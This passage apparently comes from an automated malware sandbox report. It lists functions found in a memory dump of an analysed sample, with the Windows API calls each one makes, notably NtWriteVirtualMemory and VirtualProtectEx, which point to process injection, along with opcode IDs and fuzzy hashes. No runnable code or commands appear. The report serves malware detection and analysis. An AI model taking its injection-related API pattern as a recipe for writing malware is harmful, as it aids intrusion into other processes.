                                                                                                                                          • Part of subcall function 00FB3830: NtWriteVirtualMemory.NTDLL ref: 00FB384F
                                                                                                                                        • VirtualProtectEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FAFBE4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$MemoryProtectWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1789425917-0
                                                                                                                                        • Opcode ID: 0ce16aded698ca03c3b82ecaa6156b11d5de4fcc1feac8faaa761be50cfad355
                                                                                                                                        • Instruction ID: 251e2b38473e418956f29e65199f83db6c9265c0ededbd271370030b12545c14
                                                                                                                                        • Opcode Fuzzy Hash: 0ce16aded698ca03c3b82ecaa6156b11d5de4fcc1feac8faaa761be50cfad355
                                                                                                                                        • Instruction Fuzzy Hash: 2B015A70A18B088FCB48EF99A0C552AB7E0EB9C310B4005AEE84DC7256CA74DD45CB86
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FAA92C, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • FindCloseChangeNotification.KERNELBASE ref: 00FAA97D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                        • Opcode ID: bfcf9b11c8a571321a20197ae80eed82d55b94b58a0f7e34586d0728a82784e3
                                                                                                                                        • Instruction ID: e32f8474dfafc9db6fb7b57a2b62a8058e7652a3af08ab8255c7d3fd5c0d9428
                                                                                                                                        • Opcode Fuzzy Hash: bfcf9b11c8a571321a20197ae80eed82d55b94b58a0f7e34586d0728a82784e3
                                                                                                                                        • Instruction Fuzzy Hash: A5F0C274718B0A4BEB98DF68D484A2EB7E1FBDC311F44592DB506C3250CF74C8058B02
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00FC2E50, Relevance: 1.5, APIs: 1, Instructions: 237stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000023.00000002.853027168.0000000000FA1000.00000020.00000001.sdmp, Offset: 00FA1000, based on PE: false
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1534048567-0
                                                                                                                                        • Opcode ID: 1608627adbaccf2637d2de6840cab0dcfe8de2003ac308ffa53b0243ab2e23b6
                                                                                                                                        • Instruction ID: 3b63c21f29ab4aed24307d2b153d3ecc9011af2cf491e8206e0124c5b5812aa9
                                                                                                                                        • Opcode Fuzzy Hash: 1608627adbaccf2637d2de6840cab0dcfe8de2003ac308ffa53b0243ab2e23b6
                                                                                                                                        • Instruction Fuzzy Hash: 8B61813161CB4A8FC758DF18C486B7AB7F1FB99754F14462EE48A83211DB30E946DB82
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Non-executed Functions